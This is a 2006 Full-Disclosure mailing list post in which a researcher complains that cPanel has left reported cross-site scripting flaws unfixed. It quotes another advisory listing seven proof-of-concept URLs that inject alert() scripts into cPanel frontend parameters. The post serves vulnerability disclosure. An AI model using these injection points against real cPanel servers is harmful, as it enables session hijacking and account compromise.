| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri Feb 3 06:21:51 2006
From: csullo at gmail.com (Sullo)
Subject: cPanel Multiple Cross Site Scripting
Vulnerability
On 3/13/2004 I notified cPanel that they had major XSS issues in their
backend... beyond what I was actually sending them or documenting, and they
should fix them. They agreed.
However, based on this, it doesn't look like they've done much in the two
years since I posted:
http://www.cirt.net/advisories/cpanel_xss.shtml
On 2/2/06, simo@...x.org <simo@...x.org> wrote:
>
> Title: cPanel Multiple Cross Site Scripting
> Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> Affected scripts with proof of concept exploit:
>
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
> <script>alert('vul')</script>&domain=
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
> <script>alert('vul')</script>&domain=xxx
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
> "><script>alert('vul')</script>
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
> "><script>alert('vul')</script>
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
> "><script>alert('vul')</script>&target=xxx
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
> "><script>alert('vul')</script>&domain=xxx&target=xxx
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
> "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
>
--
http://www.cirt.net | http://www.osvdb.org/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060203/b2103454/attachment-0001.html
Powered by blists - more mailing lists